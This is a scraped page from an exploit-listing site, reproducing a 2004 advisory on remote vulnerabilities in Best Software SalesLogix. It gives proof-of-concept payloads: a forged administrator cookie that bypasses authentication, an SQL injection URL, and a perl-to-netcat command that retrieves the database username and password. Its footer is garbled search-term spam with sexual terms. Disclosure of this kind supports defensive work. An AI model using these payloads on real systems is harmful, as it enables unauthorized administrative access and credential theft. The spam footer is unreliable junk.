about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Best Software SalesLogix Multiple Remote Vulnerabilities


Title Best Software SalesLogix Multiple Remote Vulnerabilities
Published 2004-10-18-12:00AM
Updated 2004-10-18-06:11PM
Class Design Error
CVE   CVE-MAP-NOMATCH
Remote  Yes
Local  No
Credit  Disclosure of these issues is credited to "Carl" <carl@agenda-security.co.uk>.
Vulnerable  SalesLogix Corporation SalesLogix 2000.0
Microsoft IIS 4.0
Best Software SalesLogix
Not Vulnerable  
Code   The following proof of concepts have been provided:

Admin authentication bypass cookie value:
slxweb=user=Admin|teams=ADMIN!|usertype=Administrator|

SQL Injection example:
http://www.example.com/scripts/slxweb.dll/view?name=coninfo&id=[SQL]

Revealing the database username and password:
perl -e 'print "x0"x10 . "x20" . "x0"x3 .
"GetConnectionx0SALESLOGIX_SERVERx0"' | netcat 1.2.3.4
1707

Finally the following script has been provided as a proof of concept for the file upload issue: /data/vulnerabilities/exploits/salesLogixFileUploadPoC.pl
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Tue, 02 Dec 2008 05:06:39 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Sex lades www.tharun www.sexyni sex+auntys www.doodh. mambo Remo arab SEX place sex t186t Mark CMS is Fre t186t crack+data www.craigs nude boys News Searc jayamalini news for / WW.89com nude boys uname -a vallarta OSX 10.3 Local root CMS+is+Fre mambo Remo movie mons XXX PHOTOS free nude 200 /compo Sex gillia Sex movei f o t o s Grils Gone aishwarya WWW.Asean mambo Remo aishwarya nats CMS is Fre sarah azha sexel indian mag mambo Remo sahila sex news for c Gambar blu forum free lo li pop miracle an